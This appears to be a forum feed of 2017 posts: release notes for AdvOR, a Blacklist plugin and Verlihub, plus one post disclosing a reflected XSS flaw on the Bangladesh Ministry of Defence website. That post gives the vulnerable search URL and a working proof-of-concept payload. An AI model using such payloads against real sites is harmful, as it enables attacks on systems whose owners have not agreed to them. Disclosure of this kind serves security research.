AdvOR 0.3.1.5

Changes in 0.3.1.5

- geoip_c.h was updated with GeoIPCountryWhois.csv released on October 4'th; there are 163953 IP ranges having 32 ranges in the fake "A1" country; all 32 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0g
- updated directory authorities according to https://atlas.torproject.org/#search/flag:Authority

File information: AdvOR 0.3.1.5

Posted by advor on 2017-11-05 14:06 ⋅ 0 comments ⋅ 4 likes

Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC

http://www.mod.gov.bd/site/search?key=<img%20src=x%20onerror=alert(1)//">

You can either include any XSS code in search input box, or request any XSS code directly using GET method and key parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.

Posted by Neo on 2017-09-07 22:04 ⋅ 1 comment ⋅ 8 likes

AdvOR 0.3.1.4

Changes in 0.3.1.4

- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 153678 IP ranges having 32 ranges in the fake "A1" country; 31 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0f

File information: AdvOR 0.3.1.4

Posted by advor on 2017-06-11 10:48 ⋅ 0 comments ⋅ 8 likes

Blacklist 1.2.2.6

Changes in 1.2.2.6

# 1.2.2.6 - Fixed bypass of public proxy lookup for local and private IP addresses in chat mode

File information: Blacklist 1.2.2.6

Posted by vhpython on 2017-05-22 12:47 ⋅ 0 comments ⋅ 9 likes

Verlihub 1.0.3.9

Even more stable.

Changes in 1.0.3.9

Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.3.9

Posted by verlihub on 2017-05-22 12:41 ⋅ 0 comments ⋅ 9 likes